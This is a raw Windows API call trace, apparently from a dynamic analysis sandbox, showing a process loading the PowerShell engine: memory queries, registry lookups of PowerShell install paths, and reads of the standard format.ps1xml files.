	[0288.467] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.467] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.467] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.467] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.470] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.472] VirtualQuery (in: lpAddress=0x1ac080, lpBuffer=0x1acf40, dwLength=0x30 | out: lpBuffer=0x1acf40*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.472] VirtualQuery (in: lpAddress=0x1ac080, lpBuffer=0x1acf40, dwLength=0x30 | out: lpBuffer=0x1acf40*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.472] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0288.473] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0290.832] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0290.833] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0290.833] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0290.837] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0290.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0290.837] CoTaskMemFree (pv=0x329c00) 
	[0290.839] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0290.843] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0290.843] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0290.843] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0290.843] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0290.844] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0290.844] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0290.845] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0290.845] VirtualQuery (in: lpAddress=0x1ac070, lpBuffer=0x1acf30, dwLength=0x30 | out: lpBuffer=0x1acf30*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0290.846] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad528 | out: phkResult=0x1ad528*=0x32c) returned 0x0
	[0290.846] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x1ad53c, lpData=0x0, lpcbData=0x1ad538*=0x0 | out: lpType=0x1ad53c*=0x1, lpData=0x0, lpcbData=0x1ad538*=0x74) returned 0x0
	[0290.846] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x1ad4ac, lpData=0x0, lpcbData=0x1ad4a8*=0x0 | out: lpType=0x1ad4ac*=0x1, lpData=0x0, lpcbData=0x1ad4a8*=0x74) returned 0x0
	[0290.846] CoTaskMemAlloc (cb=0x78) returned 0x37ab40
	[0290.846] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x1ad47c, lpData=0x37ab40, lpcbData=0x1ad478*=0x74 | out: lpType=0x1ad47c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ad478*=0x74) returned 0x0
	[0290.846] CoTaskMemFree (pv=0x37ab40) 
	[0290.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1ad1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0290.846] SetErrorMode (uMode=0x1) returned 0x1
	[0290.846] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1ad400 | out: lpFileInformation=0x1ad400*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0290.846] SetErrorMode (uMode=0x1) returned 0x1
	[0290.847] SetErrorMode (uMode=0x1) returned 0x1
	[0290.847] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad400 | out: lpFileInformation=0x1ad400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0290.847] SetErrorMode (uMode=0x1) returned 0x1
	[0290.847] SetErrorMode (uMode=0x1) returned 0x1
	[0290.847] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad400 | out: lpFileInformation=0x1ad400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0290.847] SetErrorMode (uMode=0x1) returned 0x1
	[0290.848] SetErrorMode (uMode=0x1) returned 0x1
	[0290.848] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad400 | out: lpFileInformation=0x1ad400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0290.848] SetErrorMode (uMode=0x1) returned 0x1
	[0290.848] SetErrorMode (uMode=0x1) returned 0x1
	[0290.848] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad400 | out: lpFileInformation=0x1ad400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0290.848] SetErrorMode (uMode=0x1) returned 0x1
	[0290.848] SetErrorMode (uMode=0x1) returned 0x1
	[0290.848] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad400 | out: lpFileInformation=0x1ad400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0290.848] SetErrorMode (uMode=0x1) returned 0x1
	[0290.849] SetErrorMode (uMode=0x1) returned 0x1
	[0290.849] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad400 | out: lpFileInformation=0x1ad400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0290.849] SetErrorMode (uMode=0x1) returned 0x1
	[0290.849] SetErrorMode (uMode=0x1) returned 0x1
	[0290.849] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad400 | out: lpFileInformation=0x1ad400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0290.849] SetErrorMode (uMode=0x1) returned 0x1
	[0291.692] SetErrorMode (uMode=0x1) returned 0x1
	[0291.692] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad400 | out: lpFileInformation=0x1ad400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0291.692] SetErrorMode (uMode=0x1) returned 0x1
	[0291.692] SetErrorMode (uMode=0x1) returned 0x1
	[0291.692] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad400 | out: lpFileInformation=0x1ad400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0291.693] SetErrorMode (uMode=0x1) returned 0x1
	[0291.693] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0291.693] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0291.693] CoTaskMemFree (pv=0x329c00) 
	[0291.695] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0291.695] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0291.695] CoTaskMemFree (pv=0x329c00) 
	[0291.695] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0291.695] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0291.695] CoTaskMemFree (pv=0x329c00) 
	[0291.696] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0291.696] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0291.696] CoTaskMemFree (pv=0x329c00) 
	[0291.696] SetErrorMode (uMode=0x1) returned 0x1
	[0291.696] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0291.696] GetFileType (hFile=0x300) returned 0x1
	[0291.696] SetErrorMode (uMode=0x1) returned 0x1
	[0291.696] GetFileType (hFile=0x300) returned 0x1
	[0291.696] ReadFile (in: hFile=0x300, lpBuffer=0x333d2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x333d2b8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0291.698] ReadFile (in: hFile=0x300, lpBuffer=0x333d2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x333d2b8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0291.698] ReadFile (in: hFile=0x300, lpBuffer=0x333d2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x333d2b8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0291.698] ReadFile (in: hFile=0x300, lpBuffer=0x333d2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x333d2b8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0291.699] ReadFile (in: hFile=0x300, lpBuffer=0x333d2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x333d2b8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0291.699] ReadFile (in: hFile=0x300, lpBuffer=0x333d2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x333d2b8*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0291.699] ReadFile (in: hFile=0x300, lpBuffer=0x333d2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x333d2b8*, lpNumberOfBytesRead=0x1ad098*=0x9e2, lpOverlapped=0x0) returned 1
	[0291.699] ReadFile (in: hFile=0x300, lpBuffer=0x333c802, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x333c802*, lpNumberOfBytesRead=0x1ad098*=0x0, lpOverlapped=0x0) returned 1
	[0291.699] ReadFile (in: hFile=0x300, lpBuffer=0x333d2b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x333d2b8*, lpNumberOfBytesRead=0x1ad098*=0x0, lpOverlapped=0x0) returned 1
	[0291.700] CloseHandle (hObject=0x300) returned 1
	[0291.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0291.700] SetErrorMode (uMode=0x1) returned 0x1
	[0291.700] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad040 | out: lpFileInformation=0x1ad040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0291.700] SetErrorMode (uMode=0x1) returned 0x1
	[0291.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0291.700] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad128 | out: phkResult=0x1ad128*=0x300) returned 0x0
	[0291.700] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad0ac, lpData=0x0, lpcbData=0x1ad0a8*=0x0 | out: lpType=0x1ad0ac*=0x1, lpData=0x0, lpcbData=0x1ad0a8*=0x56) returned 0x0
	[0291.700] CoTaskMemAlloc (cb=0x5a) returned 0x3d8f30
	[0291.700] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad07c, lpData=0x3d8f30, lpcbData=0x1ad078*=0x56 | out: lpType=0x1ad07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad078*=0x56) returned 0x0
	[0291.700] CoTaskMemFree (pv=0x3d8f30) 
	[0291.701] RegCloseKey (hKey=0x300) returned 0x0
	[0291.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0291.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0291.708] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xd955948a, Data2=0xee53, Data3=0x4211, Data4=([0]=0x98, [1]=0x4d, [2]=0x2d, [3]=0x67, [4]=0x3, [5]=0x3a, [6]=0x35, [7]=0x99))) returned 0x0
	[0291.717] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x11dbf2d4, Data2=0xbd45, Data3=0x48f3, Data4=([0]=0xad, [1]=0xf, [2]=0x72, [3]=0x9, [4]=0x9b, [5]=0xb0, [6]=0xd0, [7]=0x6c))) returned 0x0
	[0291.719] SetErrorMode (uMode=0x1) returned 0x1
	[0291.719] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0291.719] GetFileType (hFile=0x300) returned 0x1
	[0291.719] SetErrorMode (uMode=0x1) returned 0x1
	[0291.719] GetFileType (hFile=0x300) returned 0x1
	[0291.719] ReadFile (in: hFile=0x300, lpBuffer=0x3367e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3367e20*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0291.720] ReadFile (in: hFile=0x300, lpBuffer=0x3367e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3367e20*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0291.720] ReadFile (in: hFile=0x300, lpBuffer=0x3367e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3367e20*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0291.721] ReadFile (in: hFile=0x300, lpBuffer=0x3367e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3367e20*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0291.721] ReadFile (in: hFile=0x300, lpBuffer=0x3367e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3367e20*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0291.722] ReadFile (in: hFile=0x300, lpBuffer=0x3367e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3367e20*, lpNumberOfBytesRead=0x1ad098*=0xfb2, lpOverlapped=0x0) returned 1
	[0291.722] ReadFile (in: hFile=0x300, lpBuffer=0x336753a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x336753a*, lpNumberOfBytesRead=0x1ad098*=0x0, lpOverlapped=0x0) returned 1
	[0291.722] ReadFile (in: hFile=0x300, lpBuffer=0x3367e20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3367e20*, lpNumberOfBytesRead=0x1ad098*=0x0, lpOverlapped=0x0) returned 1
	[0291.722] CloseHandle (hObject=0x300) returned 1
	[0291.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0291.722] SetErrorMode (uMode=0x1) returned 0x1
